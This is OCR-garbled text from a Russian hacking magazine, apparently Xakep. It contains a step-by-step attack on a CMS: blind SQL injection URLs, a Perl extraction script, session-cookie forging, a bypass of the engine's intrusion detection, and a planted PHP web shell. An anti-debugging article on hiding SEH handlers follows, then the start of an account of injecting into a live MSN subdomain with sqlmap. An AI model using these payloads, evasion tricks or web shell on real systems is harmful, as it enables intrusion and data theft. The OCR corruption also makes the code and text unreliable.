ВІіпсІ 501 инъекцию, ибо проблема заключается в том, что мы не 
видим результата выполнения запросов, или каких-либо вспо- 
могательных данных. Мы можем только определять, возвратит ли 
наш запрос истину или ложь. К слову сказать, это не единствен- 
ный скрипт, подверженный данной атаке. На досуге попробуй сам 
найти аналогичные скрипты в этом движке, уязвимые к ВІіпсІ 501- 
инъекции. 

Используя уязвимость, мы можем получить любые данные, хранящие- 
ся в базе данных, правда, для этого придется постараться. 

К примеру, чтобы узнать версию СУБД, надо посимвольно перебирать 
все возможные варианты посылкой подобныхзапросов: 

• ЪЩрр: // [зегѵег] / [ іпзСаІІсІіг ] /тосіиіез/тусіоѵлііоасіз/ 
Ъгокепіііе . рЬр?1іс!=1+апс1+азсіі ( зиЬзкгіпд (ѵегзіоп 0,1, 

а.) =зз 

• Ъ±кр: // [зегѵег] / [ іпзкаіісііг ] /тосіиіез/тусіоѵлііоасіз/ 
Ъгокепіііе . ркр?1іс[=1+апс1+азсіі ( зиЬзкгіпд (ѵегзіоп ( ) , 1 , 

1) =34 

• іШкр: // [зегѵег] / [ іпзкаіісііг ] /тосіиіез/тусіоѵтіоасіз/ 
Ьгокепіііе . ркр?1іс1=1+апс1+азсіі ( зиЬзкгіпд (ѵегзіоп ( ) , 1 , 

1) =35 

В зависимости оттого, какой запрос вернул истину, мы узнаем первую 
цифру версии СУБД. Аналогичным способом можноузнать любые другие 
данные, в том числе и хэш пароля администратора. 

Обычно на этом люди останавливаются, и, получив хэш, пытаются его рас- 
шифровать. Мы же пойдем другим путем. Если у нас есть доступ кбазеданных, 
то почему бы не попытаться достать оттуда данные сессий пользователей, 
которые хранятся в базе, а после чего — не прописать иху себя в соокіез? 

Н БАЛУЕМСЯ С СЕССИЕЙ 

Соокіез пользователя после 1)РІ_-декодирования представляют собой 
строку вида: 

а:3 : {і: 0 ; і : 1 ; і : 1 ; з : 40 : "аа805Ъ9 8сі7 87е312а6е87сІ58813 9599 
9есІе09а7с1" ; і : 2 ; і : 1227993983 ; } 

Из этой информации нам необходимы три значения: первое — длинная 
строка в двойных кавычках, которая вероятнее всего представляет 
собой некую хэш-функцию от пароля; второе — это іб пользователя, кото- 
рый хранится после второго по счету символа і в нашей строке (тут ісІ=1 ], а 
также последнее значение — число 1227993983. 

Если мы проделаем некоторые действия в системе, а потом опять 
обратимся ксоокіе, то мы увидим, что последнее число изменилось, а іб 
пользователя и хэш остались неизменными. 

а:3 : {і: 0 ; і : 1 ; і : 1 ; з : 40 : "аа805Ъ9 8сІ7 87е312а6е87сі58813 9599 
9есІе09а7сІ" ; і : 2 ; і : 1227994551; } 

а : 3 : { і : 0 ; і : 1 ; і : 1 ; з : 40 : " аа805Ь98Л7 87еЗ 12абе87й58813 9599 
9есіе09а7с1" ; і : 2 ; і : 1227995080 ; } 




Исходник картинки сХ55 скриптом 

Более того, очевидно, что поел ед нее число линейно за висит от вре- 
мени, а хэш является константой, сгенерированной для пользова- 
теля единожды и хранящейся в базе. Это означает, что нам доста- 
точно один раз перехватить соокіез и потом мы сможем заходить 
неограниченное число раз, пока пользователь не сменит пароль 
при условии, что мы будем знать, как генерируется третье значение, 
зависящее от времени. Нам необходимо получить эти три значения 
(іб пользователя, хэш и функцию от времени] из базы, чтобы мы 
могли залогиниться пользователем, даже незнаяего пароля. Зна- 
чения хранятся в таблице гипстз.гипспп5_5е55Іоп. Хэш хранится в 
переменной ЬазЬ, а іб пользователя, соответственно, в переменной 
изег_іб. А вот что касается последней цифры, то она высчитывается 
как значение поля Ете + 2678400 (в поле 0 те хранится время пос- 
леднего обращения пользователя на сайт]. 

Теперь, когда мы знаем, где находятся нужные нам переменные, достать 
ихуже делотехники. Можно использовать озвученную выше уязвимость 
типа ВиіЧБ БОЫщесбоп. Для автоматизации действий был написан 
скрипт(за основу взятскриптг57зц[_осЬ.р[, спасибо его авторам], кото- 
рый посимвольно перебирает все возможные значения необходимых 
нам данных, таких какбазЬ, изег_іб и бте. Ниже приведена основная 
часть скрипта, где происходит посылка запроса и обработка ответа 
(полную версию ищи на диске]. 

$ТШСр_диегу = $раЦ]т. " АББ азсіі (иррег ( зиЪзБгіпд ( (ЕЕ 
ЬЕСТ СОЖІАТ (ипате , СНАК (58) , ЬазЪ. , СНАК. ( 58 ) ,Біте) ЕКОМ 
гипстз . гипсшз_зеззіоп ШЕКЕ иісІ= " . $изег_і<б. " ) , " . $з_ 
пит. " , 1) ) ) " . $сс!іеск; 

# отправляем запрос 

## ргіпк "\г\п $ТШкр_диегу \г\п" ; 

$тсЬ_гедиезк = ШР: : ІІзегАдепк->пеіл ( ) ог <біе; 

$гез = $тсЬ_гедиезк->розк ( $ТШкр_диегу ) ; 

# получаем ответ сервера 
©гезиікз = $гез->сопСепк ; 

ТогеасЪ. $гези1к (©гезиікз ) 

{ 

# ищем в ответе скрипта строку, совпадающую с нашим усло- 
вием 

іі ($гезиІС =~ /$зСгіпд/) { геСигп 1; } 

} 

геСигп 0; 

} 

В результате запуска нашего скрипта где-то за 2-5 минут мы получаем 
хэш и время, которое необходимо подставить себе в соокіе. 
Единственный нюанс: если пол ьзовател ь за это время будет 
вести активную деятельность, то у него изменится значение Ете. 
В этом случае можно просто перебрать ближайшие значения в 
пределах 3 минут (что не составляет труда] или заново запустить 
скрипт. 

Н ОБХОДИМ СИСТЕМЫ ОБНАРУЖЕНИЯ АТАК 

Итак, у нас получился отличный эксплоит, и мы уже почти у цели, но тут 
есть один неприятный момент. Система ВипСМ5 имеетветроенный 
модуль обнаружения атак, который записывает в специальный лог-файл 
попытки БОБ-инъекций. По-хорошему, нам требуется обойти данную 
систему, чтобы максимально скрытно провести атаку. Логи можно 
посмотреть в файле — 
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Страница смены пароля (нетребуетзнания предыдущего пароля] 

\1Шс1осз\гипстз_1 . 6\саске\зд1ігщ есБ . БхБ 

Посмотрим, что же происходит, и почему наши запросы попадаютв логи. 
Скрипт добавляет следующий код кзапросу в СУБД и посылаетего на 
сервер: 

АКБ азсіі (иррег ( зиЪзБгіпд ( (ЗЕБЕСТ ССЖСАТ (ипате , СНАЕ ( 58 
) ,ЬазЬ., СНАЕ ( 58 ) , Біте) ЕЕОМ гипстз . гипстз_зеззіоп ШЕЕЕ 
иіс! = " . $изег_ісЕ " ) , " . $з_пит. " , 1) ) ) 

Опытным путем выяснилось: основная сигнатура, по которой опреде- 
ляется, что происходит инъекция, — это ключевое слово «ЕРОМ» после 
ключевого слова «5ЕІ_ЕСТ» вне зависимости оттого, какие ключевые 
слова есть между ними. Также было выяснено, что движок распознает 
«опасные» ключевые слова, если они втексте отделены пробелами. 
Напрашивается идея составить 50Е-за проста к, чтобы в нем не было 
пробелов. Такая возможность есть. Не буду мучить тебя выкладками, 
просто скажу, что вместо пробелов, чтобы отделять переменные от 
команд, можно использовать скобки. Итоговый запрос будет выглядеть 
так: 

АББ азсіі ( зиЬзБгіпд ( (ЗЕБЕСТ (раз з) ЕЕОМ (гипстз . гипстз_ 
изегз)ШЕЕЕ иі<Т= м . $изег_іс1. '*),"* $з_пит. " , 1) ) " . $ссНеск; 

В этом запросе я просто вынимаю хэш пароля администратора. Мы мо- 
жем теперь слегка модифицировать наш скрипт, и он будет работать не- 




Модифицируем шаблоны 

заметнодля встроенной системы обнаружения атакв движке ВипСМВ. 
Вот пример его работы: 

е : \огас1е\ргос!исБ\10 . 1 . 0\йЬ_1\рег1\5 . 6 . 1\Ьіп\ 
МЗМп32-х86>рег1 . ехе іиск.рі ЬББр:/ 

/192.168.40. 2 6/гипстз_1 . 6/тосіи1ез/тус1оѵт1оас1з/ѵізіБ . 
рЪ.р?1ісІ=1 1 

****** ЕшіСМЗ 1.6 Вііпсі ЗОБІгщесБіоп + ІБЗ Еѵазіоп Ьу 
ЗЬ2кегг (БЗесЕС) ****** 

****************************************************** 

*********************** 

:) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) 

:) :) :) :) :) :) :) 

:) :) :) :) :) :) :) :) :) :) :) :) :) 

****************************************************** 

*********************** 

АсЗшіп Раззѵ^огсі Назк: сі4е8е6<іеаа7Ыі83 81е09еЗе6Ь83еЗ 6 
10Ь681с5с 

****************************************************** 

********************** 

Н ПОСЛЕДНЕЕ КОЛЬЦО ОБОРОНЫ 

Мы научились получать права администратора в системе ВипСМВ, причем, 
какминимум, двумя совершенно разными способами. Что же делать дальше? 



Попытки проведения 50Е-инъекции в логах сервера 
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Страница загрузки файлов на сервер 

Ответочевиден — пытаться получить шелл на сервере, пользуясь 
доступной нам панелью администрации. Какоказалось, это совсем 
несложно. Админка позволяет модифицировать некоторые шаблоны, 
написанные на РНР, которые инклудятся к страницам движка. Ктаким 
шаблонам, к примеру, относятся: 

раде : /тосіиіез/туііпкз/асітіп/іпсіех . ркр?ор=туЬіпкзСопі 
ідАсІтіп 

рагатекег пате= " сіізсіаітег " 
раде : /тосіиіез/зескіопз/асітіп/іпсіех . ркр?ор=зессопРід 
рагатеСег пате= ' іпкго ' 

раде : /то<іи1ез/пе^ЬЬ_р1из/а<±піп/Еогит_соп^ід . ркр 
рагатеСег пате= " сіізсіаітег " 

Пройдем по ссылке — 

НЩрр: //192 . 168 . 40 . 26/гшістз_1 . 6/тос1и1ез/ту1іпкз/асітіп/ 
іпсіех . рЬр?ор=туЬіпкзСопіідАсІтіп 

В открывшейся странице найдем поле сіізсіаітег, впишем в него следу- 
ющую строку: 




Результат работы рбр-шелла 

<?есію зузкеш ( $_СЕТ [сошшапсі] ) ; ?> 

После чего перейдем кстранице шаблона, который мы изменили, и 
передадим ей команду ірсопбд на выполнение: 

ЬССр : //192 .168.40. 26/гипстз_1 . 6/тосІиІез/туІіпкз/сасЪе/ 
сіізсіаітег . ркр?соттапсі=ірсопіід 

Результат работы можно видеть на скриншоте. Если вставить в 
любую из этих страниц-шаблонов РНР-шелл, мы получим доступ к 
командной строке сервера, ну а дальше все будет зависеть от твоей 
фантазии. 

Н ПРИГЛАШАЕМ В КОМАНДУ 

Итак, сегодня мы рассмотрели один достаточно популярный движок и 
проверили его на наличиетиповыхуязвимостей. На мой взгляд, получи- 
лось довольно интересно. Найденныеуязвимости удачно пересекались 
между собой, что привело нас к получению доступа ккомандной строке 
сервера. 

Анализ данного движка и эксплоиты к нему (также, как ко многим другим 
исследованным системам] можно найти на сайте исследовательской 
лаборатории компании ОідііаІЗесигііу (Овес РеазегсЬ Огоир зесгд.ги ). 
Мы всегда рады пригласить талантливую молодежь в нашу команду, кто 
заинтересовался. ПЕ 



Результат работы скрипта 
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РИС КАСПЕРСКИ 



СКРЫТАЯ УСТАНОВКА 5ЕН-0БРАБ0ТЧИК0В 






поговорим о методах скрытой установки 5ЕН-обработчиков, используемых 



і 



обсудим возможные контрмеры анти-анти-отладочных способовТ^^^^^Ь 



^ взлом 



В ПОСТАНОВКА ПРОБЛЕМЫ 

Структурные исключения представляют собой мощное антиотладочное 
средство, в чем мы уже убедились на примере предыдущих выпусков. 
Там же мы познакомились и с техникой исследования программ, игра- 
ющихся исключениями, работус которыми достаточно трудно замаски- 
ровать. Всякий раз, когда в тексте программы встречается конструкция 
«МОѴ Р5: [0] , ххх», хакер сразу встаетторчком — раз это РЗ : [0], 
значит, программа устанавливает собственный 5ЕН-обработчик и, судя 
по всему, сейчас будетбросать исключения. Теоретически, возможно 
засунуть «МОѴ РЗ : [0] , ххх» в самомодифицирующийся код, убрав 
его из дизассемблерных листингов, однако против аппаратнойточки 
останова по записи на «МОѴ РЗ: [0] , ххх» ничего не спасет. В момент 
установки нового 5ЕН-обработчика отладчиктутже «всплывет», де- 
маскируя защитный механизм. А ЗеШпЬапсПейЕхсерСіопЕіІСег 
вообще представляет собой АРІ-функцию, экспортируемую КЕКЫЕЬ32 . 
въь, которую легко обнаружить любым АРІ-шпионом, даже без анализа 
всего дизассемблерного кода! 

Задача: установить собственный обработчик структурных исключений, 
нота к, чтобы это как можно меньше бросалось в глаза и не палилосьтри- 
виальной установкойточекостанова. Решением мы сейчас, собственно, 
и займемся, предложив широкий ассортиментантиотладочныхтрюков, 
один интереснее другого. 



В ПЕРЕЗАПИСЬ СУЩЕСТВУЮЩЕГО ОБРАБОТЧИКА 

Вместо того чтобы устанавливать новый обработчик структурных 
исключений, некоторые (и достаточно многие] защиты предпочитают 
модифицировать указатель на уже существующий. Даже если приложе- 
ние и не уста на вл и вает н и каких 5 ЕН -обработчиков, система все равно 
впихиваетему 5ЕН-обработчик поумолчанию, смотрящий куда-то в де- 
бри КЕЕЫЕЪЗ 2 . въъ. На этом, кстати говоря, основан популярный прием 
поиска базового адреса загрузки КЕКЫЕЪ32 .БЫ* в котором нуждается 
збеіі-код, атакже программы, написанные без использованиятаблицы 
импорта (из-за ошибки в системном загрузчике они работа ют только на 
ХР и более поздних версиях). 

Обработчикпоумолчанию не делает ничего полезного и потому без него 
можно обойтись, «позаимствовав»указатель — на время или навсегда. 
Конкретный пример реализации приведен ниже: 

Установка своего 5ЕН-обработчика 
без перезаписи ячейки Г5:[0] 

зоигіг ( ) 

{ 

ргіпС^ ( "Ііеііо , пегитіХп" ); 

ЕхіЕРгосезз ( 0 ) ; 

} 
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ЙІ И шгеРеРеіпТрг 



Дизассемблерный листинг АРІ -функции ЗеШ п Ьа псііесі Ехсерііоп РіИ:ег из| 
|Висты. Каквидно, со времен ѴѴ2Кее реализация сильноусложнилась 



і.пС *р=0 ; 
азш{ 



тоѵ еах, Нз : [ 0 ] 
Іеа есх, зоигіг 
асісі еах, 4 
тоѵ [еах] , есх 



іЛІуоЬд - ык-і№. 



мет ЕЭЬчд ррнэгй алтей» нф 

\ЩИ*1 ±Ш '5І1ГМЖМ 4|к|_м|т]Нн|с|/|к|и|к]...|к] 



СРУ - гпліп ЦнсасІ. тябніс 5Ш-06 



Ме штагу тар 




кружения потока на карте памяти процесса 



асісі еах, 4 
тоѵ [еах] , есх 



Внешне кодочень похожна классический способ установки 5ЕН-об- 
работчика, но, присмотревшись внимательнее, мы видим, что в нашем 
примере модифицируется отнюдь не ячейка «РЗ : [ 0] », а то, на что она 
указывает. Точка останова по записи на «РЗ : [0] »уже не сработает, 
однако сегментный регистр РЗ режет глаз, да и брякна «РЗ : [0]» по до- 
ступу продолжает работать, а потому для эффективного противодействия 
хакерутребуются дополнительныеуровни маскировки. Ну и чего мы 
сидим? Вперед! 

Н ПРЯЧЕМ Р5 

Ослепить дизассемблеры совсем нетрудно. Перезаписатьуказатель на 
системный 5ЕН-обработчик можно и без явного использования сегмент- 
ного регистра РЗ. Самое простое, что можно сделать — скопировать 
его в любой другой сегментный регистр (например, ОЗ]. Сточки зрения 
процессора, регистры РЗ и ОЗ совершенно равноправны. Главное, 
чтобы в регистре содержался «правильный» селектор, а его название 
— уже дело десятое. Создавать новые селекторы мы не можем (точнее, 
можем, но это тема отдельного разговора], а вот загружать существую- 
щие — почему бы и нет? 

Усиленный фрагмент защиты приведен ниже: 

ПРЯЧЕМ РЕГИСТР Р5 ОТ ЛЮБОПЫТНЫХ ГЛАЗ 

азт{ 

тоѵ ах, Нз 
тоѵ дз , ах 

} 



} 



азт{ 



тоѵ еах, дз : [ 0 ] 
Іеа есх, зоигіг 



Небольшое пояснение. Поскольку ни один известный мне компиля- 
тор не использует регистр ОЗ для своих целей, то его можно инициа- 
лизировать в одной процедуре, а использовать — в другой. Единст- 
венное условие — обе процедуры должны принадлежать одному 
потоку, поскольку каждый поток обладает собственным регистровым 
контекстом. 

Начинающиххакеров обращение крегистру 03 дробитна части, сва- 
ливая в вертикальный штопор. Короче, это какобухом по голове. Ольга 
(в отличие отАйса) не показываетзначений сегментных регистров, чем 
серьезно осложняет ситуацию. 

Опытных реверсеровтаким макаром не проведешь, но никаких гаран- 
тий, что 03 в данный момент содержит именно РЗ, а не, например, 

05, у нас нет. А потому статический анализ становится неоднозначным 
и требует реконструкции последовательности вызываемых функций. 
Причем, обращения к РЗ вявном видеможети не быть — его значение 
легко прочитать АРІ-функцией СеСТЬгеаОСопСехС, на которую, ко- 
нечно, нетрудно поставить точку останова, но точки останова — это уже 
динамический, а не статический анализ! 

Самое интересное, что блококружения потока, засунутый в селек- 
тор (который хранится в сегментном регистре РЗ], отображается на 
плоское адресное пространство, а значит, доступен для чтения и 
через остальные селекторы. Например, через сегментный регистр 
05. На ѴѴ2К блок окружения первичного потока начинается садреса 
7РРРВ000І1 (7РРРЕ000І1 на ХР), поэтому вместо РЗ: [0] допустимо 
использовать конструкцию РЗ : [7РРРВ000И] . Чтобы избежать краха, 
надо отталкиваться оттого факта, что в настоящем блоке окружения 
потока по смещению ЗОЬ байтотего начала расположен указатель на 
блококружения процесса, лежащий на ІОООІі байт ниже. Благодаря 
чему мы можем найти указатель на 5ЕН-обработчик даже на неизвест- 
ной операционной системе! 
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Конечно, реализация алгоритма существенно усложняется, но это даже 
хорошо, поскольку, чем больше строк кода — тем дольше их будет анали- 
зировать хакер, тем более, если эти строки бессмысленны сами по себе. 

Поиск блока окружения потока в стеке 

іпі а; 

іпі *р=0 ; 

ипзідпесі сЕаг *рр = (ипзідпесі сЕаг*) 0х7РРЕ0000; 

іог (а = 0 ; а < 6 ; а++) 

{ 

рр -= 0x1000; 

іі (ІзВасІКеасІРіг (рр , 4)) сопііпие; 

іі (ІзВасІКеасІРіг ( (рр + 0x3 0) , 4) ) сопііпие; 

ІО ( * ( (зІ 2 е_і*) (рр + 0x30) ) == ( (зіге_і) 
рр + 0x1000) ) 

{ 

*(зІ 2 е_і*) ( * ( ( зіге_і* ) рр) + 4) = (зіге_і*) зоигіг; 

геіигп *р ; 

} 

} 

ргіпіі ( "пор Іоипс1\п" ) ; 

Во-первых, мы обошлись без ассемблерных вставок, реализовав алго- 
ритм на чистом Си (стем же успехом можно использовать Паскаль]. Во- 
вторых, вместо характерного «ЕЗ» в программе появилась куча констант, 
смысл которых понятен только посвященным, да и то — не без присталь- 
ного анализа, сопровождаемого глубокой медитацией. В-третьих, факт 
передачи управления на функцию зоигіг по геіигп *р(где р == О) 
совершенно не очевиден. Ктомуже, сам указатель на зоигі 7 . можно за- 
шифровать, помешав дизассемблерам реконструировать перекрестные 
ссылки. Какэто сделать на Си (без ассемблерных вставок], описывалось 



блеров, а отладчики просто ставятсюда точку останова по доступу, и 
все обращения к ЕЗ : 0 немедленно палятся. Независимо оттого, какой 
адрес используется — смещение 0 по селектору ЕЗ или же смещение 
7РРОВ0006 по селектору РЗ. 

Непорядок! Хорошая защита должна справляться не только с дизассем- 
блерами, но и с отладчиками! 

^ КРАЖА ЧУЖИХ ОБРАБОТЧИКОВ 

Системный обработчикструктурных исключений расположен на дне 
стека потока — и обращаться к блоку окружения для его поисков совсем 
не обязательно, поскольку местоположение обработчика непостоянно 
и зависит отверсии операционной системы. Сучетом этого мы должны 
выработатьэвристический алгоритм поиска. 

Системный обработчик, назначаемый поумолчанию, есть не что 

иное, как функция « ехсері_Еапс!1егЗ», расположенная в недрах 

КЕКЫЕЬЗ 2 . РЕЕ и не экспортируемая наружу, но присутствующая в 
отладочных символах. Которые, теоретически, можно в любой момент 
скачать с серверов МісгозоК, но практически —такое решение будет 
слишком громоздким, неудобным, ненадежным, да и довольно «про- 
зрачным» для хакера. 

Хорошо, будем отталкиваться оттого, что « ехсе р а п сі Іе гЗ » смотрит 

в КЕЕЫЕЕ32 . рее и что перед ним всегда расположено двойное слово 
«ЕЕЕЕЕЕЕЕЕ», а после него — указатель на секцию данных КЕЕЫЕЦ32 . 
рщ , опять-таки содержащий в себе двойное слово «ЕЕЕЕЕЕЕЕЕ». Пос- 
леднее обстоятельство системнозависимо, но справедливо как для ѴѴ2К, 
так и для ХР, а потому его можно использовать без особых опасений. 
Практический пример приведен ниже: 

Прямой поискуказателя на 5ЕН-обработчик в стеке 

Іог ( а=0 ; а<69 ; а++ , рр+ + ) 



{ 



іі ( ІзВасІКеасІРіг ( (рр+2 ) , 4)) 



в одном из выпусков сишныхтрюков. 

Существуют и другие способы поиска указателя на блок окружения пото- 
ка. Рассмотрим только два самых популярных. Просматривая карту па- 
мяти (а просмотреть ее можно с помощью АРІ-вызова ѴігіиаІСХіегу], 
даже удав заметит, что блоки окружения процесса и потока лежат в своих 
собственных секциях памяти сатрибутами Ргіѵаіе и правами на чте- 
ние/запись. Размер каждого блока равен 1 0006, плюс ко всему указатель 
на блококружения процесса расположен по смещению ЗОИ байт от блока 
окружения потока. То есть, если *((зІ 2 е_І*) (Ыоск_1+30Е) ) == 
Ыоск_2,то Ыоск_1 — блококружения потока, а Ыоск_2 — блококруже- 
ния процесса и «МОѴ ЕАХ, ЕЗ : [ 0 ]» равносильно МОѴ ЕАХ , Ыоск_ 

1 /МОѴ ЕАХ, [ЕАХ] . Вывод: без ЕЗ можно по-любому обойтись. 
Указатель на блококружения потока также находится в стеке потока, куда 
его кладетоперационная система. В ѴѴ2К/ХР это третье двойное слово 
от вершины. И хотя в последующих версиях его местоположение может 
измениться, вирусы это обстоятельство походу никак не заботит, и они 
используютего сплошь и рядом. 

И что в итоге? Мы рассмотрели множество приемов скрытного обраще- 
ния кячейке ЕЗ : 0, однако все они действуюттолько против дизассем- 



Ьгеак; 

іі (*рр == ОхРРРРРРРР) 

{ 

іі ( ІзВасІКеасІРіг ( * (рр + 2 ) , 4)) 
сопііпие; 

іі (*( (ипзідпесі іпі* )* (рр + 2 ) ) == ОхРРРРРРРР) 

{ 

* (рр + 1) = (ипзідпесі іпі*) зоигіг; 
геіигп *р ; 

} 

} 

} 

ргіпіі("поі ІоипсІѴп") ; 

Точка останова на ЕЗ : 0 на этот раз идет лесом и не срабатывает, 
поскольку обращения кэтой ячейке памяти уже не происходит. Ктомуже, 
разобраться, что именно ищет программа в стеке, можно после серии 
экспериментов (ну или чтения этой статьи]. Способов поиска системного 
обработчика исключений намного больше одного. Это существенно 



► 058 
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взлом 




ЭКСПЛУАТИРУЕМ КРУПНЕЙШИЙ ПРОЕКТ МІСК050РТ 

МЗЫ.сош — один из самых популярных ѴѴЕВ-ресурсов компании Місгозоіт. 
Он сочетает в себе новостные ленты, видео-сервисы, аналитические матери- 
алы и многочисленные статьи, а также огромный ряд подпроектов. Что уж 
тут говорить — такой ресурс просто не может остаться без внимания хакера. 



е будутянуть кота за хвост, описывая неудачные приемы 
взлома. Спустя три часа ковыряния поддоменнов я нашел 
первый 501. Традиционные [для хакера, — Прим. РогЬ] 
запросы кбазе позволили узнать ее версию и пользователя, 
ответственного за базу. Учитывая эти факты, мне стало ясно, что СУБД 
крутится на другом сервере: 

• Ьіір : / /Ьизіпезз . га .шзп . сот/тзп/ѵіеѵ\г_агііс1е . рЬр?іЬ=- 
1+ШІ(Ж+АШ+ЗЕЬЕСТ+1 ,2,3,4, 5,6, %2 Оѵегзіоп ( ) 

• Ьіір : / /Ьизіпезз . га .шзп . сот/тзп/ѵіеѵ\г_агіісіе . рЬр?іЬ=- 
1+ШІС№+АЬЬ+ЗЕЬЕСТ+1 , 2 , 3 , 4 , 5 , 6 ,изег ( ) 

Дальнейшая задача состояла в том, чтобы выдрать все доступные 
таблицы из базы. В первую очередьтребовалосьзаняться подбором 
колонок. Во избежание лишнего геморроя логичнее всего использовать 
специальный автоматизированный софт. Одной из самых популярных 
утилит для этого является здітар [ здітар.зоигсеіюгде.пеі ]. Разумеется, 
за тебя эта программа баги искать не будет, тебе требуется натравить ее 
для эксплуатации. 

Корректный запуск программы с нужными параметрами приведен ниже: 

руіЬоЬ зрітар.ру -и Ьіір: / /Ьизіпезз . га.тзп. сот/тзп/ѵіеѵ\г_ 

► обо 



агіісіе . рЬр?іЬ=-1 -і --Ьаппег --сиггепі-изег --сиггепі- 
сПэ --іаЫез 

Где опция «-і» означает«фингерпринт» базы, а «-Ьаппег» возвращает 
баннер. Вместе с этой опцией указываем параметры для показа текущего 
юзера, названия БД и списка таблиц. Для наглядности можно использо- 
вать ѵегЬозе-фла г. При этом будет понятно, удалась инъекция или нет. 

$ руіЬоп зцішар.ру -и Ьіір : //Ьизіпезз . га .шзп . сош/шзп/ѵіеѵ7_ 
агіісіе. рЬр?іЬ=-1 -ѵ 1 

[Ыі:тш:01] [ШЕО] іезііпд соппесііоп іо іЬе іагдеі игі 
[Ыі:тш:01] [ШРО] іезііпд іі іЬе игі із зіаЫе, маіі а іеѵ/ 
зесопЬз 

[ Ыі : тш : 0 2 ] [ШЕО] игі із зіаЫе 

[ЬЬ:тт:02] [ШРО] іезііпд іі Изег-Адепі рагатеіег Шзег- 
Адепі • із Ьупатіс 

[Ыі:тш:02] [ѴШШШС] Изег-Адепі рагатеіег Шзег-Адепі' із 
поі Ьупатіс 

[Ыі:тт:02] [ШЕО] іезііпд іі СЕТ рагатеіег 1 ІЬ 1 із Ьупатіс 
[Ыі:тт:02] [ШЕО] сопіігтіпд іЬаі СЕТ рагатеіег 'ІЬ' із 
Ьупатіс 
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[> Ѵкм Ьк^гв Счъѵ в Н*1р 

а “ .^2 Й 5 * ^Жідіхідди ^да^ аші 



&вч* ■** ЛктЬгіп АІ+Е 
И ИамРр' АИ+Н 





1 №№* 




| «Яг** 


ДІ+К 


І ЕГ^Оі*» 


№0 


1 








! ВцпЬг** 




1 




I ІЬдг 





віаіпС ) 

{ 



іпі *р=0; 

азшЕ 

тоѵ еах, ’Ез: [0] 
Іеа есх, зоигіг 
асіеі еах, 4 
тоѵ [еах] , есх 
} геШгп *р; 



|Просмотр 5ЕН- цепочек в Ольге| 



$ЗЕН-01.ехе 
Ьеііо, пегіші 



усложняетзадачу хакера и универсальных «отмычек» тут нет, что в плане 
защиты очень даже хорошо. Однако просмотр цепочки обработчиков 
структурных исключений (в Ольге осуществляется через меню Ѵіеѵѵ -> 
5ЕН СЬаіп] немедленно разоблачаетхакнутый обработчик, на который 
несложно установить точку останова на исполнение со всеми вытекаю- 
щими отсюда последствиями. 

Н РУКОТВОРНЫЙ 5ЕТІЖНАЫ0І.Е0ЕХСЕРТІ0ЫРІІ.ТЕК 

АРІ-функция ЗеШпкашіІейЕхсерІзіопЕіІСег, какуже отмечалось 
в предыдущих выпусках, сама по себе представляет проблему для 
отладчиков, поскольку установленный ею фильтр исключений верх- 
него уровня при запуске программы под отладчиком не выполняется 
и приходится использовать разнообразные плагины для Ольги, чтобы 
заставить систему считать, что никакого отладчика здесь нет. Или же, 
как вариант, насильственно включать фильтр верхнего уровня в цепочку 
обработчиков структурных исключений. Самый большой недостаток 
функции ЗеСШкапс11есІЕхсерСіопЕіІС.ег втом, что ее вызов очень 
трудно замаскировать, нотрудно еще не значит невозможно. Ктомуже, 
реализация функции проста, как движок от «запора». Фактически, она 
всего лишьустанавливает глобальную переменную ВазерСиггепСТо 
рЬеѵеІЕіШег, хранящуюся внутри КЕКІЯЕЬ32.0Ы* и используемую 
только функцией ШкапРІесІЕхсерСіопЕіІСег. 

Дизассемблерный листинг АРІ-функции 
БеШпЬапсНегіЕхсерІіопРіІІег изѴѴ2К 

. СехВ : 7 945ВС45_ЗеШпкапс11есІЕхсерЦіопРіІВег@4 ргос пеаг 
. СехВ : 7945ВС45 

. СехС : 7945ВС45 1рТорЬеѵеІЕхсерЦіопРіІСег= склгогсі рСг 4 
. ВехВ : 7945ВС45 

. ВехВ : 7945ВС45 тоѵ есх, [езр+ІрТорЬеѵеІЕхсерВіопРіІВег ] 

. СехС : 7 945ВС49 тоѵ еах, _ВазерСиггепЦТорЬеѵеІРіШег 
. ВехВ : 7945ВС4Е тоѵ _ВазерСиггепЦТорЬеѵеІРіІСег , есх 

. СехВ : 7945ВС54 геВп 4 

. ВехВ : 7 945ВС54 _8еВШкапс11есІЕхсерВіопРі11іег@4 епсір 

Все, что нам нужно — это найти ВазерСиггепСТорЬеѵеІРіІСег 
внутри ЗеШпЬапсІІесІЕхсерСіопЕіІСег (ил и ШЬапсІІесІЕхсе 
рСіопЕіІСег] и прописать сюда указатель на свой собственный 
обработчикисключений. Ксожалению, это не избавляетнасот 
необходимости импортирования 5еШпкапс11есІЕхсерСіопРіІС.ег/ 
ШЬапсІІеОЕхсерСіопРіІСег или получения эффективного адреса 
путем ручного разбора таблицы экспорта КЕКЫЕЬ32 .вьь. Да, конечно, 
ручной разбор с использованием хэш-сум вместо имен АРІ-функций до 
некоторой степени скрываетнаши намерения от хакера. Увы, нетничего 
тайного, что ни стало бы явным. Даже если выбранный хэш-алгоритм 
математически необратим, запустив программу под отладчиком, всегда 
можно установить, какой именно АРІ-функции какой хэш соответствует. 

В последних версиях ѴѴіпбоѵѵз появилась шифровка указателей, и ВазерС 
иггепСТорЬеѵеІЕіІСег хранится в закодированном виде. Естественно, 
возможность«ручной» работы суказателями никуда не делась и в ШЮЫ*. 



Скрытая установка 5ЕН-обработчика 

ВЬЬ появились функции КСІЕпсоРеРоіпСег/кдіЕесосІеРоіпСег, 
имена которых говорят сами за себя. Все это существенно усложняет реа- 
лизацию защиты и делает ее экономически нецелесообразной, вынуждая 
искать другие пути. И такие пути действительно есть! 

Библиотечный обработчикструктурных исключений, поставляемый 
вместе с языками высокого уровня, интенсивно использует АРІ -функ- 
цию ШЬапсІІейЕхсерСіопРіІСег, что позволяет нам перехваты- 
вать ее путем правки таблицы импорта (или любым другим способом]. 
Конечно, модификация импорта — грязный трюк, привлекающий к 
себе внимание, поэтому лучше хакнуть непосредственно саму библио- 
течную функцию обработки исключений. В случае М5 ѴС эта функция 

носит имя « ХсрСЕіІСег». Первые байты трогать нежелательно 

— иначе I БА Рго ее не распознает, впрочем, байт байту рознь. ЮА Рго 
пропускает относительные вызовы, поскольку они непостоянны и 
подвержены сезонным вариациям. Нам нужно найти САШ Рипс и 
заменить Рипс адресом нашей функции туДюпс, выполняющей неко- 
торые действия и при необходимости возвращающей управление ори- 
гинальной Еипс. Анализ кода « ХсрСРіІСег» обнаруживает вызов 

